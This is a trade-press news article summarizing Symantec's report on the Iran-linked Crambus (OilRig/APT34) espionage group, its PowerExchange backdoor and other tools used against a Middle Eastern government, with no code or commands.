Crambus cyber espionage group exploits PowerShell backdoor to target Middle Eastern government

Symantec researchers have exposed the operations of the Crambus espionage group (also known as OilRig and APT34), which focuses on infiltrating the Middle Eastern government. These attackers, believed to be linked to Iran, have compromised numerous computers and servers over the course of eight months, between February and September 2023.

“During the compromise, the attackers stole files and passwords and, in one case, installed a PowerShell backdoor (dubbed PowerExchange) that was used to monitor incoming mails sent from an Exchange Server in order to execute commands sent by the attackers in the form of emails, and surreptitiously forwarded results to the attackers,” the Symantec Threat Hunter Team, wrote in a blog post last week. “Malicious activity occurred on at least 12 computers and there is evidence that the attackers deployed backdoors and keyloggers on dozens more.”

In addition to deploying malware, “the attackers made frequent use of the publicly available network administration tool Plink to configure port-forwarding rules on compromised machines, enabling remote access via the Remote Desktop Protocol (RDP). There is also evidence the attackers modified Windows firewall rules in order to enable remote access,” the post added.

Back in February this year, Trend Micro researchers provided an analysis of an APT34 malware infection campaign that targets organizations in the Middle East for cyberespionage in December 2022. Using the backdoor malware, the campaign abuses legitimate but compromised email accounts to send stolen data to external mail accounts controlled by the attackers. The APT34 malware has been documented to target organizations worldwide, particularly companies from the financial, government, energy, chemical, and telecommunications industries in the Middle East since at least 2014.

Crambus, an enduring Iranian espionage powerhouse, has orchestrated impactful operations across countries, asserting its dominance in the realms of Saudi Arabia, Israel, the United Arab Emirates, and beyond, Symantec detailed. Renowned for its intrusion campaigns focused on intelligence gathering, Crambus has lately introduced a sophisticated social engineering element, amplifying its attack strategies for maximum impact.

In a demonstration of its capabilities, Crambus gained widespread attention following its involvement in a significant assault on the Albanian government, as revealed by Microsoft last year. Unveiling its multifaceted approach, the group penetrated networks, extracted vital data, and potentially deployed devastating wipers, further solidifying its status as a formidable player in the realm of cyber espionage.

During the latest attack, Symantec detailed that Crambus deployed three previously undiscovered pieces of malware, along with the PowerExchange backdoor, a known backdoor that hadn’t yet been attributed to Crambus. In addition to malware, the attackers made use of a number of living-off-the-land and legitimate tools.

The Backdoor[dot]Tokel has the ability to execute arbitrary PowerShell commands and download files. The command and control (C&C) address is stored in a separate, RC4 encrypted file called token.bin, which is saved in the working directory. Trojan[dot]Dirps is used to enumerate all files in a directory and execute PowerShell commands; Infostealer[dot]Clipog is an information-stealing malware that is capable of copying clipboard data, capturing keystrokes, and logging processes where keystrokes are entered.

The researchers also detailed Backdoor[dot]PowerExchange, a PowerShell-based malware that can log into an Exchange Server with hardcoded credentials and monitor for emails sent by the attackers. “It uses an Exchange Server as a C&C. Mails received with ‘@@’ in the subject contain commands sent from the attackers which allows them to execute arbitrary PowerShell commands, write files, and steal files. The malware creates an Exchange rule (called ‘defaultexchangerules’) to filter these messages and move them to the Deleted Items folder automatically,” they added.

Additionally, the post identified Mimikatz, a publicly available credential dumping tool, and Plink, a command-line connection tool for the PuTTY SSH client toolset being used by the Crambus espionage group. 

In its conclusion, Symantec identifies Crambus as a long-running and experienced espionage group that has extensive expertise in carrying out long campaigns aimed at targets of interest to Iran. “After a 2019 leak of its toolset, there was some speculation that Crambus may disappear. However, its activities over the past two years demonstrate that it represents a continuing threat for organizations in the Middle East and further afield,” it added. 

Earlier this month, Symantec researchers revealed the presence of Grayling, a previously unknown advanced persistent threat (APT) group that used custom malware and multiple publicly available tools. These hackers have targeted several organizations in the manufacturing, IT, and biomedical sectors in Taiwan. Furthermore, a government agency located in the Pacific Islands, as well as organizations in Vietnam and the U.S. also appear to have been hit as part of this campaign. The team identified that hacker activity began in February this year and continued until at least May.

Anna Ribeiro

Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.